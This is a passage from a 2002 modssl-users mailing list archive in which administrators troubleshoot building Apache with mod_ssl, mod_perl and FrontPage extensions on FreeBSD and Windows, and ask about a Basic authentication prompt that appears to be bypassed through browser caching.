-I/export/home/rkh/httpd-2.0.35/modules/proxy -I/export/home/rkh/httpd-2.0.35/include -I/export/home/rkh/httpd-2.0.35/srclib/apr/include -I/export/home/rkh/httpd-2.0.35/srclib/apr-util/include -I/local/ssl/include/openssl -I/local/ssl/include -I/export/home/rkh/httpd-2.0.35/modules/dav/main -I/export/home/rkh/httpd-2.0.35/srclib/apr-util/include -I/export/home/rkh/httpd-2.0.35/srclib/apr-util/xml/expat/lib -c ssl_engine_kernel.c && touch ssl_engine_kernel.lo ssl_engine_kernel.c:1809: conflicting types for `ssl_callback_LogTracingState' mod_ssl.h:639: previous declaration of `ssl_callback_LogTracingState' *** Error code 1 make: Fatal error: Command failed for target `ssl_engine_kernel.lo' Current working directory /export/home/rkh/httpd-2.0.35/modules/ssl *** Error code 1 make: Fatal error: Command failed for target `all-recursive' Current working directory /export/home/rkh/httpd-2.0.35/modules/ssl *** Error code 1 make: Fatal error: Command failed for target `all-recursive' Current working directory /export/home/rkh/httpd-2.0.35/modules *** Error code 1 make: Fatal error: Command failed for target `all-recursive' Regards Ray -- RFC-822 : R.K.Hillman@bton.ac.uk X.400 : S=hillman; G=ray; O=bton; PRMD=uk.ac; ADMD= ; C=GB Tel : +44 1273 600900 Ext. 2644 or +44 1273 642644 (direct) Fax : +44 1273 642666 Http : http://www.bton.ac.uk/ http://sirius.admin.bton.ac.uk/backhander/ Systems Manager, University of Brighton Information Services, Watts Building, Moulsecoomb, Brighton, East Sussex, UK, BN2 4GJ ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Apr 12 19:44:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA03671; Fri, 12 Apr 2002 19:43:17 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from rcisd.com id TAA03643; Fri, 12 Apr 2002 19:42:43 +0200 (MET DST) Received: from chuck ([206.128.139.13]) by rcisd.com (8.9.3/8.9.3) with SMTP id KAA28681 for ; Fri, 12 Apr 2002 10:42:35 -0700 Message-ID: <007d01c1e249$4a5ec7a0$0d8b80ce@chuck> From: "Chuck Goehring" To: References: Subject: Re: modssl for Apache 2.0 Date: Fri, 12 Apr 2002 10:41:34 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Chuck Goehring" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Cliff, Found it. Problem was mod_ssl didn't get built/installed by VS so I had no module to load. Somehow I got the idea it was now "integrated" as opposed to a module. I wasn't too clear headed at 10:00 pm when I wrote the initial post. Thanks Chuck ----- Original Message ----- From: "Cliff Woolley" To: "modssl" Sent: Wednesday, April 10, 2002 10:05 PM Subject: Re: modssl for Apache 2.0 > On Wed, 10 Apr 2002, Chuck Goehring wrote: > > > I see all the activity on the list about Apache 2.0 and modssl. Where > > can I get the necessary "stuff" for Apache 2.0. I don't see it on the > > modssl, openssl or Apache web sites. I need to get ssl up on Apache on > > Windows 2000. > > mod_ssl now comes bundled with Apache 2.0. Just download the .zip or the > .msi from http://www.apache.org/dist/httpd/ and openssl from > http://www.openssl.org/ if you don't already have it and that's all you > need. > > --Cliff > > -------------------------------------------------------------- > Cliff Woolley > jwoolley@apache.org > Apache HTTP Server Project > > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Apr 12 22:48:17 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id WAA12279; Fri, 12 Apr 2002 22:47:44 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from sage-one.net id WAA12185; Fri, 12 Apr 2002 22:46:19 +0200 (MET DST) Received: from SAGEONE (sageone [192.168.0.5]) by sage-one.net (8.11.6/8.11.6) with SMTP id g3CKkHK40003; Fri, 12 Apr 2002 15:46:18 -0500 (CDT) (envelope-from admin@sage-one.net) Message-Id: <3.0.5.32.20020412154626.02e4f930@mail.sage-one.net> X-Sender: admin@mail.sage-one.net X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.5 (32) Date: Fri, 12 Apr 2002 15:46:26 -0500 To: modssl-users@modssl.org From: Server Admin Subject: Re: mod_perl Cc: Mike Loiterman , , In-Reply-To: <20020411094920.C12150-100000@sduwebship.student.umd.edu> References: <3.0.5.32.20020411100804.02dba548@mail.sage-one.net> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Server Admin X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users HURRAY!!!! I got apache+modssl plus, mod_php, mod_perl, mod_frontpage all installed and the things works! Loads right up without complaint. BUT, now.... can anyone tell me how to get the FrontPage extensions actually loaded so that the FP client can access the site...??? FrontPage says "no extensions on the server". I've tried starting apache with "apachectl -DMOD_FP", but no dice.... This is my LAST obstacle.... please, anyone who can advise about staring those darn extensions with ssl loaded... or is that possible....??? At 10:01 AM 4.11.2002 -0500, Philip M. Gollucci wrote: >Do this: > >cvsup /usr/share/examples/cvsup/ports-supfile >cd /usr/ports/www/apache13-modssl >make install distclean >cd ../mod_frontpage >make install distclean >cd /usr/local/sbin >./apachectl startssl >tail /var/log/httpd-error.log >[Thu Apr 11 15:53:21 2002] [notice] Apache/1.3.24 (Unix) >FrontPage/5.0.2.2623 mod_ssl/2.8.8 OpenSSL/0.9.6a configured >-- resuming normal operations >[Thu Apr 11 15:53:21 2002] [notice] Accept mutex: flock (Default: flock) > >For reference, I just did this myself 5 >minutes ago with FreeBSD4.5-RELEASE and ports as of 5 minutes ago >Works like a charm. > > >END >--------------------------------------------------------------------------- --- >Philip M. Gollucci (p6m7g8) philip@p6m7g8.com 301.314.3118 301.646.3011 > >Science, Discovery, & the Universe (UMCP) > Webmaster & Webship Teacher > URL: http://www.sdu.umd.edu > >EJournalPress.com > Database/PERL Programmer & System Admin > URL : http://www.ejournalpress.com > >Homepage : http://p6m7g8.com >Resume : http://p6m7g8.com/Work/index.html >Software : http://p6m7g8.com/Developement/ > > > >On Thu, 11 Apr 2002, Server Admin wrote: > >> Hello: Running FBSD 4.5, I've been struggling with my first Apache+modssl >> install from ports and get the need to recompile with -DEAPI error as well >> when I run configtest. I'm unfamiliar as to what to do about that except >> most likely some modifications need to be made to the Makefile in each >> port... This are the latest ports with apache+mod_ssl-1.3.24+2.8.8. >> >> It doesn't like the mod_ssl2.8.8 port that is supposed to be alright for >> the SSL install...., so wondered why it didn't make install right.... and >> what would be the modifications?... sorry to impose on your time, but >> tearing out my hair and not much left before going bald! >> >> Here's the error, if you have a moment to look and advise. Need a secure >> server setup badly.... thanks in advance! >> >> INSTALL ERROR >> ====================================================================== >> [Wed Apr 10 18:26:46 2002] [warn] Loaded DSO libexec/apache/libphp4.so uses >> plain Apache 1.3 API, this module might crash under EAPI! (please recompile >> it with -DEAPI) >> [Wed Apr 10 18:26:46 2002] [warn] Loaded DSO >> libexec/apache/mod_frontpage.so uses plain Apache 1.3 API, this module >> might crash under EAPI! (please recompile it with -DEAPI) >> ====================================================================== >> >> At 03:01 AM 4.11.2002 -0500, Philip M. Gollucci wrote: >> >if you install apache from ports then just go to the mod_perl port and >> >install that too. It will work fine. >> > >> > >> >END >> >--------------------------------------------------------------------------- >> --- >> >Philip M. Gollucci (p6m7g8) philip@p6m7g8.com 301.314.3118 301.646.3011 >> > >> >Science, Discovery, & the Universe (UMCP) >> > Webmaster & Webship Teacher >> > URL: http://www.sdu.umd.edu >> > >> >EJournalPress.com >> > Database/PERL Programmer & System Admin >> > URL : http://www.ejournalpress.com >> > >> >Homepage : http://p6m7g8.com >> >Resume : http://p6m7g8.com/Work/index.html >> >Software : http://p6m7g8.com/Developement/ >> > >> > >> > >> >On Thu, 11 Apr 2002, Mike Loiterman wrote: >> > >> >> >> >> -----BEGIN PGP SIGNED MESSAGE----- >> >> Hash: SHA1 >> >> >> >> I currently have apache installed via its port, but I need to use >> >> mod_perl. It is my understanding that apache needs to be recompiled >> >> in order for this to work. How should I go about doing this? Should >> >> I just cd in /usr/ports/mod_perl and do a make && make install? Will >> >> this recompile and reinstall apache? >> >> >> >> Mike Loiterman >> >> mike@ascendency.net >> >> PGP Key 0xD1B9D18E >> >> >> >> >> >> -----BEGIN PGP SIGNATURE----- >> >> Version: PGP 7.0.4 >> >> Comment: Message digitally signed by Mike Loiterman >> >> >> >> iQA/AwUBPLV80WjZbUnRudGOEQJFFACgup8vH4RnPy7tsbTAQcskaXLYmGoAnjUS >> >> 50eHNtMkvIv7+20+DY+xA4lu >> >> =SaGN >> >> -----END PGP SIGNATURE----- >> >> >> >> >> >> To Unsubscribe: send mail to majordomo@FreeBSD.org >> >> with "unsubscribe freebsd-questions" in the body of the message >> >> >> > >> > >> >To Unsubscribe: send mail to majordomo@FreeBSD.org >> >with "unsubscribe freebsd-questions" in the body of the message >> > >> > >> >> .... our website: http://www.sage-one.net/ >> >> Best regards, >> >> Jack L. Stone >> Server Admin >> >> To Unsubscribe: send mail to majordomo@FreeBSD.org >> with "unsubscribe freebsd-questions" in the body of the message >> >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org > > .... our website: http://www.sage-one.net/ Best regards, Jack L. Stone Server Admin ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Apr 12 22:57:09 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id WAA12718; Fri, 12 Apr 2002 22:56:27 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail1.rolet.com id WAA12677; Fri, 12 Apr 2002 22:55:43 +0200 (MET DST) Received: from dev4 (localhost.rolet.com [127.0.0.1]) (authenticated) by mail1.rolet.com (8.11.2/8.11.2) with ESMTP id g3CKtjQ73256 for ; Fri, 12 Apr 2002 15:55:45 -0500 (CDT) From: "Robert Covell" To: Subject: RE: mod_perl Date: Fri, 12 Apr 2002 15:53:46 -0500 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) In-Reply-To: <3.0.5.32.20020412154626.02e4f930@mail.sage-one.net> X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Importance: Normal Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Robert Covell" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users You have to run the fpsrvadm.exe on the site you want to all fp access to. >From my experience it is picky about DocumentRoot and UserDir. Hope this helps... Sincerely, Robert T. Covell President / Owner Rolet Internet Services, LLC Web: www.rolet.com Email: rcovell@rolet.com Phone: 816.471.1095 Fax: 816.471.3447 24x7: 816.210.7145 -----Original Message----- From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org]On Behalf Of Server Admin Sent: Friday, April 12, 2002 3:46 PM To: modssl-users@modssl.org Cc: Mike Loiterman; freebsd-questions@FreeBSD.ORG; modssl-users@modssl.org Subject: Re: mod_perl HURRAY!!!! I got apache+modssl plus, mod_php, mod_perl, mod_frontpage all installed and the things works! Loads right up without complaint. BUT, now.... can anyone tell me how to get the FrontPage extensions actually loaded so that the FP client can access the site...??? FrontPage says "no extensions on the server". I've tried starting apache with "apachectl -DMOD_FP", but no dice.... This is my LAST obstacle.... please, anyone who can advise about staring those darn extensions with ssl loaded... or is that possible....??? At 10:01 AM 4.11.2002 -0500, Philip M. Gollucci wrote: >Do this: > >cvsup /usr/share/examples/cvsup/ports-supfile >cd /usr/ports/www/apache13-modssl >make install distclean >cd ../mod_frontpage >make install distclean >cd /usr/local/sbin >./apachectl startssl >tail /var/log/httpd-error.log >[Thu Apr 11 15:53:21 2002] [notice] Apache/1.3.24 (Unix) >FrontPage/5.0.2.2623 mod_ssl/2.8.8 OpenSSL/0.9.6a configured >-- resuming normal operations >[Thu Apr 11 15:53:21 2002] [notice] Accept mutex: flock (Default: flock) > >For reference, I just did this myself 5 >minutes ago with FreeBSD4.5-RELEASE and ports as of 5 minutes ago >Works like a charm. > > >END >--------------------------------------------------------------------------- --- >Philip M. Gollucci (p6m7g8) philip@p6m7g8.com 301.314.3118 301.646.3011 > >Science, Discovery, & the Universe (UMCP) > Webmaster & Webship Teacher > URL: http://www.sdu.umd.edu > >EJournalPress.com > Database/PERL Programmer & System Admin > URL : http://www.ejournalpress.com > >Homepage : http://p6m7g8.com >Resume : http://p6m7g8.com/Work/index.html >Software : http://p6m7g8.com/Developement/ > > > >On Thu, 11 Apr 2002, Server Admin wrote: > >> Hello: Running FBSD 4.5, I've been struggling with my first Apache+modssl >> install from ports and get the need to recompile with -DEAPI error as well >> when I run configtest. I'm unfamiliar as to what to do about that except >> most likely some modifications need to be made to the Makefile in each >> port... This are the latest ports with apache+mod_ssl-1.3.24+2.8.8. >> >> It doesn't like the mod_ssl2.8.8 port that is supposed to be alright for >> the SSL install...., so wondered why it didn't make install right.... and >> what would be the modifications?... sorry to impose on your time, but >> tearing out my hair and not much left before going bald! >> >> Here's the error, if you have a moment to look and advise. Need a secure >> server setup badly.... thanks in advance! >> >> INSTALL ERROR >> ====================================================================== >> [Wed Apr 10 18:26:46 2002] [warn] Loaded DSO libexec/apache/libphp4.so uses >> plain Apache 1.3 API, this module might crash under EAPI! (please recompile >> it with -DEAPI) >> [Wed Apr 10 18:26:46 2002] [warn] Loaded DSO >> libexec/apache/mod_frontpage.so uses plain Apache 1.3 API, this module >> might crash under EAPI! (please recompile it with -DEAPI) >> ====================================================================== >> >> At 03:01 AM 4.11.2002 -0500, Philip M. Gollucci wrote: >> >if you install apache from ports then just go to the mod_perl port and >> >install that too. It will work fine. >> > >> > >> >END >> >--------------------------------------------------------------------------- >> --- >> >Philip M. Gollucci (p6m7g8) philip@p6m7g8.com 301.314.3118 301.646.3011 >> > >> >Science, Discovery, & the Universe (UMCP) >> > Webmaster & Webship Teacher >> > URL: http://www.sdu.umd.edu >> > >> >EJournalPress.com >> > Database/PERL Programmer & System Admin >> > URL : http://www.ejournalpress.com >> > >> >Homepage : http://p6m7g8.com >> >Resume : http://p6m7g8.com/Work/index.html >> >Software : http://p6m7g8.com/Developement/ >> > >> > >> > >> >On Thu, 11 Apr 2002, Mike Loiterman wrote: >> > >> >> >> >> -----BEGIN PGP SIGNED MESSAGE----- >> >> Hash: SHA1 >> >> >> >> I currently have apache installed via its port, but I need to use >> >> mod_perl. It is my understanding that apache needs to be recompiled >> >> in order for this to work. How should I go about doing this? Should >> >> I just cd in /usr/ports/mod_perl and do a make && make install? Will >> >> this recompile and reinstall apache? >> >> >> >> Mike Loiterman >> >> mike@ascendency.net >> >> PGP Key 0xD1B9D18E >> >> >> >> >> >> -----BEGIN PGP SIGNATURE----- >> >> Version: PGP 7.0.4 >> >> Comment: Message digitally signed by Mike Loiterman >> >> >> >> iQA/AwUBPLV80WjZbUnRudGOEQJFFACgup8vH4RnPy7tsbTAQcskaXLYmGoAnjUS >> >> 50eHNtMkvIv7+20+DY+xA4lu >> >> =SaGN >> >> -----END PGP SIGNATURE----- >> >> >> >> >> >> To Unsubscribe: send mail to majordomo@FreeBSD.org >> >> with "unsubscribe freebsd-questions" in the body of the message >> >> >> > >> > >> >To Unsubscribe: send mail to majordomo@FreeBSD.org >> >with "unsubscribe freebsd-questions" in the body of the message >> > >> > >> >> .... our website: http://www.sage-one.net/ >> >> Best regards, >> >> Jack L. Stone >> Server Admin >> >> To Unsubscribe: send mail to majordomo@FreeBSD.org >> with "unsubscribe freebsd-questions" in the body of the message >> >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org > > .... our website: http://www.sage-one.net/ Best regards, Jack L. Stone Server Admin ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Apr 13 15:04:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA24980; Sat, 13 Apr 2002 15:03:18 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id PAA24948; Sat, 13 Apr 2002 15:02:52 +0200 (MET DST) Received: by visp.engelschall.com (Postfix, from userid 1005) id 2FB544CE694; Sat, 13 Apr 2002 15:02:52 +0200 (CEST) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g3D7dhO19664; Sat, 13 Apr 2002 09:39:43 +0200 (CEST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from joshua.site-fx.net id WAA12419; Fri, 12 Apr 2002 22:49:29 +0200 (MET DST) Received: from [192.168.1.3] (gateway.site-fx.net [192.168.1.1]) by joshua.site-fx.net (8.12.1/8.12.1) with ESMTP id g3CKlNwG003829; Fri, 12 Apr 2002 13:47:23 -0700 (PDT) Subject: Re: mod_perl From: "James A. Peltier" To: Server Admin Cc: modssl-users@modssl.org, Mike Loiterman , freebsd-questions@FreeBSD.ORG In-Reply-To: <3.0.5.32.20020412154626.02e4f930@mail.sage-one.net> References: <3.0.5.32.20020411100804.02dba548@mail.sage-one.net> <3.0.5.32.20020412154626.02e4f930@mail.sage-one.net> Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Evolution/1.0.2-5mdk Date: 12 Apr 2002 13:49:05 -0700 Message-Id: <1018644545.2595.13.camel@agent-orange.int.site-fx.net> Mime-Version: 1.0 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "James A. Peltier" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Fri, 2002-04-12 at 13:46, Server Admin wrote: > HURRAY!!!! I got apache+modssl plus, mod_php, mod_perl, mod_frontpage all > installed and the things works! Loads right up without complaint. > > BUT, now.... can anyone tell me how to get the FrontPage extensions > actually loaded so that the FP client can access the site...??? FrontPage > says "no extensions on the server". I've tried starting apache with > "apachectl -DMOD_FP", but no dice.... > > This is my LAST obstacle.... please, anyone who can advise about staring > those darn extensions with ssl loaded... or is that possible....??? > > > .... our website: http://www.sage-one.net/ > > Best regards, > > Jack L. Stone > Server Admin > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message I believe there is a fpadmin program that you need to run to actually apply the FP Extensions to the VirtualHost entry you will be needing the extensions for. - James ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Apr 13 15:18:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA26425; Sat, 13 Apr 2002 15:17:12 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from hotmail.com id PAA26377; Sat, 13 Apr 2002 15:16:35 +0200 (MET DST) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Sat, 13 Apr 2002 06:15:29 -0700 X-Originating-IP: [210.49.252.9] From: "David" To: References: <3CB58301.8B6CCAF2@bourse.ch> Subject: Re: problem with SSL authentication Date: Sat, 13 Apr 2002 23:14:25 +1000 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6700 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700 Message-ID: X-OriginalArrivalTime: 13 Apr 2002 13:15:29.0575 (UTC) FILETIME=[48922B70:01C1E2ED] Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "David" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Sorry, i should have mentioned that. Yes, i have done it from a fresh browser session, and to make sure, i had even tried it on a different computer that had never actually athenticated before. So this computer was somehow accessing this secure site without ever having been sent the credentials. ----- Original Message ----- From: "Owen Boyle" To: Sent: Thursday, April 11, 2002 10:35 PM Subject: Re: problem with SSL authentication > > David wrote: > > > > My website is a https website using mod_ssl : > > Apache/1.3.22 (Unix) (Red-Hat/Linux) mod_ssl/2.8.5 OpenSSL/0.9.6 > > DAV/1.0.2 PHP/4.0.4pl1 mod_perl/1.24_01 > > > > This is what i have in my access.conf : > > > > > > AuthName https://name.of.my.website/secure > > AuthType Basic > > AuthUserFile /path/to/password/file > > Require valid-user > > > > > > Here is the problem. When i click a link to a page in the directory, > > i come up with my login screen popup. If i type the right > > username/password pair, it will display the page, if i dont, it comes > > up with a 403 error-forbidden. This is all fine. However, i was > > extremely surprised to realise that if i fail the connection to > > receive the 403 error, i can click the back button in the browser, > > then the forward button, and get the page...even tho i still havent > > even authenticated yet!!! I am assuming that I am doing something > > stupid, but i cant seem to guess what that might be. > > Are you sure it does this on a first-time login with a clean browser, > before you *ever* authenticate? > > Remember that if you login even once, your browser will cache the > username/password and use it automatically for any subsequent requests > in the protected realm (that is how you only have to authenticate once > and can navigated about in a protected realm)> > > Rgds, > > Owen Boyle. > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Apr 13 15:18:15 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA26438; Sat, 13 Apr 2002 15:17:26 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from sage-one.net id PAA26361; Sat, 13 Apr 2002 15:16:16 +0200 (MET DST) Received: from SAGEONE (sageone.sage-american [192.168.0.5]) by sage-one.net (8.11.6/8.11.6) with SMTP id g3DDGEK53854; Sat, 13 Apr 2002 08:16:14 -0500 (CDT) (envelope-from admin@sage-one.net) Message-Id: <3.0.5.32.20020413081624.02e4f930@mail.sage-one.net> X-Sender: admin@mail.sage-one.net X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.5 (32) Date: Sat, 13 Apr 2002 08:16:24 -0500 To: modssl-users@modssl.org, From: Server Admin Subject: RE: mod_perl In-Reply-To: References: <3.0.5.32.20020412154626.02e4f930@mail.sage-one.net> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Server Admin X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On earlier versions of Apache+FrontPage, and after installation, I always ran "fp_install.sh" which fully installed the extensions on the sites and set up webs. I have never run the fpsrvadm command but willing to try it if it will help. But, I've looked at all the docs on this command and I don't see anything in the description about it loading the extensions. I have found it is not enough to just intall frontpage, but the extensions have to be loaded somehow. This seems to change with every version of frontpage + Apache.... For instance on the apache13_fp in FBSD ports, to load the extensions requires # /usr/local/sbin/httpd -DMOD_FP ...this is in the bootup script "apache.sh" for version apache-1.23, but will not work in the present apache-ssl (apache ver 1.24). Following the install of Frontpage, the instructions say to add these to the http.conf to enable FrontPage, but it is crytic about WHERE to put the lines (to enable... the default is disabled) and when I put them in, apachectl configtest doesn't like the syntax. (Sheesh! It shouldn't be this hard!) FrontPageEnable # Enable Frontpage Extensions FrontPageDisable # Disable Frontpage Extensions FrontPageAdminEnable # Enable Frontpage Extensions fpadmcgi.exe FrontPageAdminDisable # Disable Frontpage Extensions fpadmcgi.exe The above seems to be a logical solution, but am puzzled by how to use it. I'm obviously not doing something right here. Please just a little more help from anyone who is trying to run frontpage with apache+ssl-1.24./2.8.8. This is maddening.... sorry for the lengthy message, but as brief as I could explain it... THANKS!!!!! At 03:53 PM 4.12.2002 -0500, Robert Covell wrote: >You have to run the fpsrvadm.exe on the site you want to all fp access to. >From my experience it is picky about DocumentRoot and UserDir. Hope this >helps... > >Sincerely, > >Robert T. Covell >President / Owner >Rolet Internet Services, LLC >Web: www.rolet.com >Email: rcovell@rolet.com >Phone: 816.471.1095 >Fax: 816.471.3447 >24x7: 816.210.7145 > >-----Original Message----- >From: owner-modssl-users@modssl.org >[mailto:owner-modssl-users@modssl.org]On Behalf Of Server Admin >Sent: Friday, April 12, 2002 3:46 PM >To: modssl-users@modssl.org >Cc: Mike Loiterman; freebsd-questions@FreeBSD.ORG; >modssl-users@modssl.org >Subject: Re: mod_perl > > >HURRAY!!!! I got apache+modssl plus, mod_php, mod_perl, mod_frontpage all >installed and the things works! Loads right up without complaint. > >BUT, now.... can anyone tell me how to get the FrontPage extensions >actually loaded so that the FP client can access the site...??? FrontPage >says "no extensions on the server". I've tried starting apache with >"apachectl -DMOD_FP", but no dice.... > >This is my LAST obstacle.... please, anyone who can advise about staring >those darn extensions with ssl loaded... or is that possible....??? > >At 10:01 AM 4.11.2002 -0500, Philip M. Gollucci wrote: >>Do this: >> >>cvsup /usr/share/examples/cvsup/ports-supfile >>cd /usr/ports/www/apache13-modssl >>make install distclean >>cd ../mod_frontpage >>make install distclean >>cd /usr/local/sbin >>./apachectl startssl >>tail /var/log/httpd-error.log >>[Thu Apr 11 15:53:21 2002] [notice] Apache/1.3.24 (Unix) >>FrontPage/5.0.2.2623 mod_ssl/2.8.8 OpenSSL/0.9.6a configured >>-- resuming normal operations >>[Thu Apr 11 15:53:21 2002] [notice] Accept mutex: flock (Default: flock) >> >>For reference, I just did this myself 5 >>minutes ago with FreeBSD4.5-RELEASE and ports as of 5 minutes ago >>Works like a charm. >> >> >>END >>--------------------------------------------------------------------------- >--- >>Philip M. Gollucci (p6m7g8) philip@p6m7g8.com 301.314.3118 301.646.3011 >> >>Science, Discovery, & the Universe (UMCP) >> Webmaster & Webship Teacher >> URL: http://www.sdu.umd.edu >> >>EJournalPress.com >> Database/PERL Programmer & System Admin >> URL : http://www.ejournalpress.com >> >>Homepage : http://p6m7g8.com >>Resume : http://p6m7g8.com/Work/index.html >>Software : http://p6m7g8.com/Developement/ >> >> >> >>On Thu, 11 Apr 2002, Server Admin wrote: >> >>> Hello: Running FBSD 4.5, I've been struggling with my first Apache+modssl >>> install from ports and get the need to recompile with -DEAPI error as >well >>> when I run configtest. I'm unfamiliar as to what to do about that except >>> most likely some modifications need to be made to the Makefile in each >>> port... This are the latest ports with apache+mod_ssl-1.3.24+2.8.8. >>> >>> It doesn't like the mod_ssl2.8.8 port that is supposed to be alright for >>> the SSL install...., so wondered why it didn't make install right.... and >>> what would be the modifications?... sorry to impose on your time, but >>> tearing out my hair and not much left before going bald! >>> >>> Here's the error, if you have a moment to look and advise. Need a secure >>> server setup badly.... thanks in advance! >>> >>> INSTALL ERROR >>> ====================================================================== >>> [Wed Apr 10 18:26:46 2002] [warn] Loaded DSO libexec/apache/libphp4.so >uses >>> plain Apache 1.3 API, this module might crash under EAPI! (please >recompile >>> it with -DEAPI) >>> [Wed Apr 10 18:26:46 2002] [warn] Loaded DSO >>> libexec/apache/mod_frontpage.so uses plain Apache 1.3 API, this module >>> might crash under EAPI! (please recompile it with -DEAPI) >>> ====================================================================== >>> >>> At 03:01 AM 4.11.2002 -0500, Philip M. Gollucci wrote: >>> >if you install apache from ports then just go to the mod_perl port and >>> >install that too. It will work fine. >>> > >>> > >>> >END >>> >>--------------------------------------------------------------------------- >>> --- >>> >Philip M. Gollucci (p6m7g8) philip@p6m7g8.com 301.314.3118 301.646.3011 >>> > >>> >Science, Discovery, & the Universe (UMCP) >>> > Webmaster & Webship Teacher >>> > URL: http://www.sdu.umd.edu >>> > >>> >EJournalPress.com >>> > Database/PERL Programmer & System Admin >>> > URL : http://www.ejournalpress.com >>> > >>> >Homepage : http://p6m7g8.com >>> >Resume : http://p6m7g8.com/Work/index.html >>> >Software : http://p6m7g8.com/Developement/ >>> > >>> > >>> > >>> >On Thu, 11 Apr 2002, Mike Loiterman wrote: >>> > >>> >> >>> >> -----BEGIN PGP SIGNED MESSAGE----- >>> >> Hash: SHA1 >>> >> >>> >> I currently have apache installed via its port, but I need to use >>> >> mod_perl. It is my understanding that apache needs to be recompiled >>> >> in order for this to work. How should I go about doing this? Should >>> >> I just cd in /usr/ports/mod_perl and do a make && make install? Will >>> >> this recompile and reinstall apache? >>> >> >>> >> Mike Loiterman >>> >> mike@ascendency.net >>> >> PGP Key 0xD1B9D18E >>> >> >>> >> >>> >> -----BEGIN PGP SIGNATURE----- >>> >> Version: PGP 7.0.4 >>> >> Comment: Message digitally signed by Mike Loiterman >>> >> >>> >> 